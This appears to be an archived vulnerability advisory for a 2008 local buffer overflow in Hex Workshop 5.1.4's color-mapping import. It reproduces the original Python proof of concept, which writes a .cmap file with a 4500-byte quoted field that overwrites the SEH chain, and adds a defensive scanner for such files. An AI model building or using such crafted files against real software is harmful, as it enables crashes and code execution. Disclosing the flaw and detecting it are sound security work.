Vendor: Hex Workshop
By: Encrypt3d.M!nd
CVSS: 7.8 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Hex Workshop
Affected Version From: 5.1.2004
Affected Version To: 5.1.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:bpsoft:hex_workshop:5.1.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow PoC

Hex Workshop 5.1.4 is vulnerable to a local buffer overflow when importing a specially crafted Color Mapping File (enc.cmap). By importing the file, a buffer overflow occurs, overwriting the SEH chain and allowing arbitrary code execution.

Mitigation:

Upgrade to the latest version of Hex Workshop 5.1.5

Exploit-DB raw data:

# Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc
# other versions are affected 
# 
# By:Encrypt3d.M!nd
# Merry Christmas & Happy New Year 2009
#
# Greetz:-=Mizo=-(Perra :-l),L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
################################################################################
#
# Just import (enc.cmap) From (Tools>Color Mapping) And See What Happen ^_^
# I Think it's Easy To Exploit but need some work *_^

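# Oversized quoted string: 4500 bytes of filler that overflow the import buffer
chars = "A"*4500

# Decodes to ' = RGB(0, 0, 0), RGB(160, 160, 160)', the colour values that follow the quoted string
foot = "\x20\x3D\x20\x52\x47\x42\x28\x30\x2C\x20\x30\x2C\x20\x30\x29\x2C\x20\x52\x47\x42\x28\x31\x36\x30\x2C\x20\x31\x36\x30\x2C\x20\x31\x36\x30\x29"

# Write a single entry: the quoted string followed by its colour values
with open('enc.cmap','w') as f:
    f.write("\x22"+chars+"\x22"+foot)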

# milw0rm.com [2008-12-28]
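
For systems that cannot yet move to 5.1.5, a pre-import check on .cmap files can flag the oversized quoted field this PoC relies on. The following is an added example, not part of the original advisory or of Hex Workshop. It assumes the entry layout seen in the PoC output ("text" = RGB(r, g, b), RGB(r, g, b)), and the 256-character limit and all function names are hypothetical, since the page does not give the real buffer size.

```python
import re

# Assumed limit for the quoted field; the page does not state the real buffer size.
MAX_NAME_LEN = 256

# Entry layout inferred from the PoC output: "text" = RGB(r, g, b), RGB(r, g, b)
RGB = r"RGB\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*\)"
ENTRY = re.compile(r'^"([^"]*)"\s*=\s*' + RGB + r"\s*,\s*" + RGB + r"\s*$")


def check_cmap_line(line, max_len=MAX_NAME_LEN):
    """Return a list of findings for one line; an empty list means it looks sane."""
    findings = []
    line = line.rstrip("\r\n")
    if not line.strip():
        return findings  # blank lines are ignored
    m = ENTRY.match(line)
    if m is None:
        # Covers unterminated quotes and anything else outside the assumed layout
        findings.append("does not match expected entry layout")
        return findings
    if len(m.group(1)) > max_len:
        findings.append("quoted field is %d characters" % len(m.group(1)))
    if any(int(v) > 255 for v in m.groups()[1:]):
        findings.append("RGB component out of range")
    return findings


def scan_cmap(text, max_len=MAX_NAME_LEN):
    """Map 1-based line number -> findings for every suspicious line."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        found = check_cmap_line(line, max_len)
        if found:
            report[n] = found
    return report


# Constructed samples: one ordinary entry and one shaped like the PoC's output.
SAMPLE_OK = '"Printable" = RGB(0, 0, 0), RGB(160, 160, 160)\n'
SAMPLE_BAD = '"' + "A" * 4500 + '" = RGB(0, 0, 0), RGB(160, 160, 160)'

if __name__ == "__main__":
    print(scan_cmap(SAMPLE_OK + SAMPLE_BAD))
```

A real color mapping file may contain line types the PoC does not show; those would be reported as layout mismatches and need the pattern extended.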